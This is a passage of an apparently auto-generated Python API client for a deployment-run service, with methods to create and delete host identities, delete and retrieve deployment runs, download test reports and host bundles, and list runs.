:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param list[CloudResourceObject] cloud_resource_object: The cloud resources to be accessed by the host identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_identity_with_http_info(id, hostid, cloud_resource_object, **kwargs) # noqa: E501
def create_identity_with_http_info(self, id, hostid, cloud_resource_object, **kwargs): # noqa: E501
"""Create a host identity # noqa: E501
Creates an identity for the deployment run host with access to the resources requested by the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_identity_with_http_info(id, hostid, cloud_resource_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param list[CloudResourceObject] cloud_resource_object: The cloud resources to be accessed by the host identity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'cloud_resource_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_identity`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `create_identity`") # noqa: E501
# verify the required parameter 'cloud_resource_object' is set
if self.api_client.client_side_validation and ('cloud_resource_object' not in local_var_params or # noqa: E501
local_var_params['cloud_resource_object'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `cloud_resource_object` when calling `create_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cloud_resource_object' in local_var_params:
body_params = local_var_params['cloud_resource_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
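    # Example (editorial sketch; CloudResourceObject construction is elided
    # because its fields live in the generated models, which are not shown here):
    #
    #     identities = api.create_identity('123', '456', [CloudResourceObject(...)])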
def delete_deployment_run(self, id, **kwargs): # noqa: E501
"""Delete Deployment Run # noqa: E501
Deletes a single inactive Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool purge: Delete all dependencies of the deployment run
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def delete_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete Deployment Run # noqa: E501
Deletes a single inactive Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool purge: Delete all dependencies of the deployment run
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'purge'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'purge' in local_var_params and local_var_params['purge'] is not None: # noqa: E501
query_params.append(('purge', local_var_params['purge'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
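    # Example (editorial sketch): delete an inactive run and purge everything
    # it depends on:
    #
    #     ok = api.delete_deployment_run('12345', purge=True)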
def delete_identity(self, id, hostid, **kwargs): # noqa: E501
"""Delete host identity # noqa: E501
Deletes the identity of a deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_with_http_info(id, hostid, **kwargs) # noqa: E501
def delete_identity_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Delete host identity # noqa: E501
Deletes the identity of a deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `delete_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identity_by_id(self, id, hostid, username, **kwargs): # noqa: E501
"""Deletes identity for specified user # noqa: E501
Deletes an identity for a user specified by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_by_id(id, hostid, username, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str username: Username of the identity to be deleted (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_by_id_with_http_info(id, hostid, username, **kwargs) # noqa: E501
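# Hedged example (placeholder identifiers): per the declared response
# type, deleting a named user's identity returns list[BaseIdentity].
#
#     remaining = api.delete_identity_by_id('run-id', 'host-id', 'jdoe')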
def delete_identity_by_id_with_http_info(self, id, hostid, username, **kwargs): # noqa: E501
"""Deletes identity for specified user # noqa: E501
Deletes an identity for a user specified by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_by_id_with_http_info(id, hostid, username, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str username: Username of the identity to be deleted (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_identity_by_id`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `delete_identity_by_id`") # noqa: E501
# verify the required parameter 'username' is set
if self.api_client.client_side_validation and ('username' not in local_var_params or # noqa: E501
local_var_params['username'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `username` when calling `delete_identity_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity/{username}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def download_deployment_run_test_report(self, id, **kwargs): # noqa: E501
"""Download Report # noqa: E501
Downloads a single Test Report for the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_deployment_run_test_report(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str file: Report file name
:param str number: Report number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.download_deployment_run_test_report_with_http_info(id, **kwargs) # noqa: E501
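# Hedged example: to keep the raw report bytes rather than a decoded
# value, preloading can be disabled so the urllib3.HTTPResponse is
# returned; the file and number values below are illustrative.
#
#     resp = api.download_deployment_run_test_report(
#         'run-id', file='report.html', number='1', _preload_content=False)
#     raw = resp.data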
def download_deployment_run_test_report_with_http_info(self, id, **kwargs): # noqa: E501
"""Download Report # noqa: E501
Downloads a single Test Report for the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_deployment_run_test_report_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str file: Report file name
:param str number: Report number
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'file', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method download_deployment_run_test_report" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `download_deployment_run_test_report`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'file' in local_var_params and local_var_params['file'] is not None: # noqa: E501
query_params.append(('file', local_var_params['file'])) # noqa: E501
if 'number' in local_var_params and local_var_params['number'] is not None: # noqa: E501
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/downloadreport', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def download_host(self, id, role, **kwargs): # noqa: E501
"""Download Host # noqa: E501
Downloads a single Host Bundle for the specified Deployment Run. Based on the background flag, the download will either be done in the foreground (false), in the background (true), or be determined by asset size (no value). If the background flag is set to true (or no value for the background flag is provided) and the host is larger than the site threshold, it will be prepared for download in the background and an email with a link to retrieve the asset will be sent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_host(id, role, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str role: Name of host to bundle for download (required)
:param bool background: Force the download to happen in the background
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.download_host_with_http_info(id, role, **kwargs) # noqa: E501
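# Hedged example (placeholder values): forcing background preparation
# of the bundle; per the docstring, oversized hosts trigger an email
# link instead of a direct download.
#
#     api.download_host('run-id', 'web-server-role', background=True)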
def download_host_with_http_info(self, id, role, **kwargs): # noqa: E501
"""Download Host # noqa: E501
Downloads a single Host Bundle for the specified Deployment Run. Based on the background flag, the download will either be done in the foreground (false), in the background (true), or be determined by asset size (no value). If the background flag is set to true (or no value for the background flag is provided) and the host is larger than the site threshold, it will be prepared for download in the background and an email with a link to retrieve the asset will be sent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_host_with_http_info(id, role, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str role: Name of host to bundle for download (required)
:param bool background: Force the download to happen in the background
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'role', 'background'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method download_host" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `download_host`") # noqa: E501
# verify the required parameter 'role' is set
if self.api_client.client_side_validation and ('role' not in local_var_params or # noqa: E501
local_var_params['role'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `role` when calling `download_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'role' in local_var_params and local_var_params['role'] is not None: # noqa: E501
query_params.append(('role', local_var_params['role'])) # noqa: E501
if 'background' in local_var_params and local_var_params['background'] is not None: # noqa: E501
query_params.append(('background', local_var_params['background'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/downloadhost', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_run(self, id, **kwargs): # noqa: E501
"""Retrieve Deployment Run # noqa: E501
Returns a single Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullDeploymentRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_run_with_http_info(id, **kwargs) # noqa: E501
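# Hedged example (placeholder ID): the decoded result is a
# FullDeploymentRun model instance.
#
#     run = api.get_deployment_run('run-id')
#     print(run)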
def get_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve Deployment Run # noqa: E501
Returns a single Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullDeploymentRun, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullDeploymentRun', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_run_reports(self, id, **kwargs): # noqa: E501
"""List Reports # noqa: E501
Returns a collection of the Test Reports for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_reports(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_run_reports_with_http_info(id, **kwargs) # noqa: E501
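# Hedged example: the listing is a plain list of report names, suitable
# as the `file` argument to download_deployment_run_test_report.
#
#     for name in api.get_deployment_run_reports('run-id'):
#         print(name)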
def get_deployment_run_reports_with_http_info(self, id, **kwargs): # noqa: E501
"""List Reports # noqa: E501
Returns a collection of the Test Reports for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_reports_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[str], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_run_reports" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_run_reports`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/reports', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs(self, id, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs for a single Deployment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs_with_http_info(id, **kwargs) # noqa: E501
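# Hedged paging example (page numbering semantics are service-defined;
# the values below are illustrative):
#
#     first = api.get_deployment_runs('deployment-id', maxresults=50, page=0)
#     second = api.get_deployment_runs('deployment-id', maxresults=50, page=1)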
def get_deployment_runs_with_http_info(self, id, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs for a single Deployment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
